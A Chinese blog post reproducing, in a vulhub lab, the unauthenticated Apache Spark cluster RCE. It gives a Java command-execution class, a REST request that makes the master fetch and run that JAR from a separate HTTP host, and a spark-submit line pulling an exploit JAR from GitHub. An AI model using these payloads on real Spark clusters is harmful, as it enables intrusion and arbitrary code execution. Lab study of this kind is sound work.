vulhub漏洞复现65_Spark

最新推荐文章于 2023-08-09 10:52:31 发布
最新推荐文章于 2023-08-09 10:52:31 发布
阅读量605 收藏
点赞数
文章标签: spark 大数据 big data 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122904031
版权

 Apache Spark 未授权访问漏洞

漏洞详情

Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。

参考链接:

 - https://weibo.com/ttarticle/p/show?id=2309404187794313453016

 - https://xz.aliyun.com/t/2490

漏洞环境

靶场:192.168.4.10_ubuntu

执行如下命令,将以standalone模式启动一个Apache Spark集群,集群里有一个master与一个slave:

#docker-compose up -d

环境启动后,访问`http://your-ip:8080`即可看到master的管理页面

 访问`http://your-ip:8081`即可看到slave的管理页面。

 

漏洞利用

该漏洞本质是未授权的用户可以向管理节点提交一个应用,这个应用实际上是恶意代码。

提交方式有两种:

1. 利用REST API

2. 利用submissions网关(集成在7077端口中)

应用可以是Java或Python,就是一个最简单的类,如(参考链接1):

```java

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class Exploit {

  public static void main(String[] args) throws Exception {

    String[] cmds = args[0].split(",");

    for (String cmd : cmds) {

      System.out.println(cmd);

      System.out.println(executeCommand(cmd.trim()));

      System.out.println("==============================================");

    }

  }

  // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/

  private static String executeCommand(String command) {

    StringBuilder output = new StringBuilder();

    try {

      Process p = Runtime.getRuntime().exec(command);

      p.waitFor();

      BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

      String line;

      while ((line = reader.readLine()) != null) {

        output.append(line).append("\n");

      }

    } catch (Exception e) {

      e.printStackTrace();

    }

    return output.toString();

  }

}

```

将其编译成JAR,放在任意一个HTTP或FTP上,如`http://192.168.4.29:9999/Exploit.jar`。

#javac Exploit.java

#jac cvf Exploit.jar Exploit.class

#python3 -m http.server 9999

 

### 用REST API方式提交应用

standalone模式下,master将在6066端口启动一个HTTP服务器,我们向这个端口提交REST格式的API:

```

POST /v1/submissions/create HTTP/1.1

Host: your-ip:6066

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Content-Type: application/json

Connection: close

Content-Length: 680

{

  "action": "CreateSubmissionRequest",

  "clientSparkVersion": "2.3.1",

  "appArgs": [

    "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"

  ],

  "appResource": "http://192.168.4.29:9999/Exploit.jar",

  "environmentVariables": {

    "SPARK_ENV_LOADED": "1"

  },

  "mainClass": "Exploit",

  "sparkProperties": {

    "spark.jars": "http://192.168.4.29:9999/Exploit.jar",

    "spark.driver.supervise": "false",

    "spark.app.name": "Exploit",

    "spark.eventLog.enabled": "true",

    "spark.submit.deployMode": "cluster",

    "spark.master": "spark://your-ip:6066"

  }

}

```

其中,`spark.jars`即是编译好的应用,mainClass是待运行的类,appArgs是传给应用的参数。

 

返回的包中有submissionId,然后访问`http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout`,即可查看执行结果:

#http://192.168.4.10:8081/logPage/?driverId=driver-20220212152052-0000&logType=stdout

 

注意,提交应用是在master中,查看结果是在具体执行这个应用的slave里(默认8081端口)。实战中,由于slave可能有多个。

### 利用submissions网关

如果6066端口不能访问,或做了权限控制,我们可以利用master的主端口7077,来提交应用。

方法是利用Apache Spark自带的脚本`bin/spark-submit`:

#docker ps

#docker exec -it 1fc8f88073b3 /bin/bash

```

bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id

```

如果你指定的master参数是rest服务器,这个脚本会先尝试使用rest api来提交应用;如果发现不是rest服务器,则会降级到使用submission gateway来提交应用。

查看结果的方式与前面一致。

#http://192.168.4.10:8081/logPage/?driverId=driver-20220212153615-0001&logType=stdout

 

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulhub复现fastison漏洞
weixin_64655821的博客
11-08 1325
Vulhub复现fastison漏洞
src.zip_Spark!_spark_spark 聚类_spark聚类
09-23
Spark上的电影信息聚类分析》 Spark,作为大数据处理领域的明星框架,以其高效、灵活和易用的特性,被广泛应用于数据挖掘、机器学习等多个领域。本篇将重点探讨如何利用Spark进行电影信息的聚类分析,以揭示隐藏...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1707
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1501
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub靶场漏洞复现
m0_60660067的博客
08-11 320
vulhub靶场,简单漏洞复现
vulhub漏洞复现-Nginx
遇事不决冲冲冲
10-28 4901
Nginx nginx是一个高性能的HTTP和反向代理web服务器。 思路 在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。 而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
Spark学习总结-入门.rar_Spark!_spark_spark入门_大数据 spark
09-24
Spark是Apache软件基金会下的一个开源大数据处理框架,以其高效、灵活和易用的特性在大数据领域备受推崇。本文将基于“Spark学习总结-入门.rar”这份资料,对Spark的基础知识进行详细阐述,帮助读者深入理解Spark的...
sparksqlCmd_Spark!_spark_
10-04
SparkSQL是Apache Spark项目的一部分,它提供了一个用于处理结构化数据的强大工具,允许开发者使用SQL或者DataFrame API来操作数据。SparkSQL集成了Hive,因此它可以读取和写入Hive表,同时支持多种数据源,如HDFS、...
SalahEddine_HebaBaze_Spark_CLOUDHPC_spark_spark_python_
10-04
标题中的"SalahEddine_HebaBaze_Spark_CLOUDHPC_spark_spark_python_"暗示了这个压缩包内容可能围绕一个由SalahEddine和HebaBaze共同探讨的Spark项目,重点关注在云计算环境(可能是CLOUDHPC)下的Python编程。...
RSS.rar_Spark!_oa_spark
09-14
Spark与通达OA整合详解——打造一体化办公体验》 在现代企业信息化管理中,高效协同办公成为提升工作效率的关键。通达OA(Office Anywhere)作为国内广泛应用的协同办公系统,提供了丰富的功能,如任务分配、流程...
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 901
vulhub中ssrf漏洞复现
vulhub漏洞复现
qq_30854761的博客
04-26 4108
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 481
vulhub漏洞复现
vulhub漏洞复现1
xhscxj的博客
05-23 1937
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 1680
struts2重要漏洞之一
vulhubWeblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2509
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2594
vulhub-spring漏洞复现
漏洞复现vulhub 中间件漏洞
最新发布
qq_46421742的博客
08-09 406
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
weixin_45095113的博客
12-21 422
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
spark安装_Spark 安装教程
06-08
Spark是一个分布式计算框架,安装需要一定的技术和操作步骤。下面是Spark安装的基本步骤: 1. 安装Java环境 Spark是基于Java开发的,因此需要先安装Java环境。可以从Oracle官网下载Java安装包,根据提示进行安装。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值